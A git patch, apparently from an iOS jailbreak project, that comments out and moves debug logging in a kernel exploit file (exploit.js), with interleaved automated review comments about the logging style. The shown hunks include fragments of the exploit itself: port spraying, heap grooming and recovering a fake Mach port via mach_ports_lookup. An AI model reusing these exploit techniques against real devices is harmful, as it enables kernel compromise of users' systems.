From 30cbeaa4c3c2e07fbabbb231591f95b6a1724e64 Mon Sep 17 00:00:00 2001 From: spv420 Date: Sun, 31 Jul 2022 20:46:39 -0400 Subject: lol --- src/stage4/kexp/exploit.js | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) (limited to 'src/stage4/kexp') diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 741f217..e761184 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -360,22 +360,22 @@ function r3gister(task, init_port_set, real_count, fake_count) { } function mach_ports_lookup_shit() { - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); var arrz = shit_heap(4); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); write_u32(arrz, 0); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); var sz = shit_heap(4);; - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); write_u32(sz, 3); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); // var mts = mach_task_self(); p0laris_log("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); - puts("helo"); - p0laris_log("mpl success\n"); - p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); - p0laris_log("mpl success\n"); +// puts("helo"); +// p0laris_log("mpl success\n"); +// p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); +// p0laris_log("mpl success\n"); return read_u32(read_u32(arrz) + 8); // return 0x42603; @@ -460,7 +460,7 @@ again: while (true) { // for (var i = 0; i < 8; i++) { var dummy = shit_heap(4); if (i % 4 == 0) { - p0laris_log("spray_ports %d\n", i); +// p0laris_log("spray_ports %d\n", i); } write_u32(fp + (i << 2), spray_ports(1)); spray(small_buf, read_u32(small_size), dummy); 
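Review bot: In `mach_ports_lookup_shit` the trace calls are commented out rather than deleted, and one `p0laris_log("fuck\n");` directly before the `calls4arg("mach_ports_lookup", ...)` line is left active, so the function still logs on every call with a message that does not say where it is. Either delete the dead lines or put all of them behind a single switch, for example `if (DEBUG_LOG) p0laris_log("mach_ports_lookup_shit: before call\n");`, where `DEBUG_LOG` is a placeholder name that is not defined on this page. The function body continues past the end of the hunk.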
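Review bot: Commenting out the only statement inside `if (i % 4 == 0) {` leaves an empty conditional in the loop at `@@ -460,7`, and the same happens in the `release_port_ptrs` loop at `@@ -470,7`. Drop the `if` together with the log, or keep both under one debug flag so the progress output can be turned back on without editing the loop body. Both loops start and end outside their hunks.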
@@ -470,7 +470,7 @@ again: while (true) { for (var i = 0; i < PORTS_NUM; i++) { // for (var i = 0; i < 8; i++) { if (i % 4 == 0) { - p0laris_log("release_port_ptrs %d\n", i); +// p0laris_log("release_port_ptrs %d\n", i); } release_port_ptrs(read_u32(fp + (i << 2))); } @@ -487,13 +487,13 @@ again: while (true) { write_u32(sz, 3); // mach_ports_lookup_shit_dealloc(); var ret__ = r3gister(mach_task_self(), arrz, 2, 3); + p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); + p0laris_log("r3gister done\n"); mach_ports_lookup(mach_task_self(), arrz, sz); p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); p0laris_log("mpl success\n"); var fake_port = read_u32(read_u32(arrz) + 8); - p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); - p0laris_log("r3gister done\n"); // while (true) { // // } -- cgit v1.2.3
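Review bot: The two lines moved up to follow `var ret__ = r3gister(...)` in the `@@ -487,13` hunk log an unlabelled `"%d %s\n"` and then a separate `"r3gister done\n"`, which is hard to attribute when read next to the `done %x %x %x %x` output a few lines below. One labelled call reads better: `p0laris_log("r3gister: %d %s\n", ret__, mach_error_string(ret__));`. The enclosing `again: while (true)` loop begins and ends outside the hunk.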